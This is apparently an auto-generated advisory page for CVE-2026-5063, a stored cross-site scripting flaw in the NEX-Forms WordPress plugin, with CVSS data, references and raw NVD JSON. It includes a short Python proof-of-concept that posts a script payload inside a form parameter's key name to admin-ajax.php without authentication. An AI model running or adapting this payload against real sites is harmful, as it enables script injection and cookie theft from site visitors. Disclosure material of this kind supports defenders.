Security Vulnerability Report
CVE-2026-5063 CVSS 7.2 HIGH

CVE-2026-5063

Published: 2026-05-03 06:15:58
Last Modified: 2026-05-05 19:13:45

Description

The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NEX-Forms <= 9.1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (example)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Malicious payload in parameter key name
# The vulnerability lies in the key name, not the value
payload_key = '"><script>alert(document.cookie)</script>'

data = {
    payload_key: "test_value",
    "action": "submit_nex_form",
}

# Send the POST request without authentication
response = requests.post(target_url, data=data)

if response.status_code == 200:
    print("Payload sent successfully. Check if XSS is triggered on the target page.")
else:
    print(f"Request failed with status code: {response.status_code}")
```

References

Plugin changeset: https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5063",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-03T06:15:57.650",
    "lastModified": "2026-05-05T19:13:44.530",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```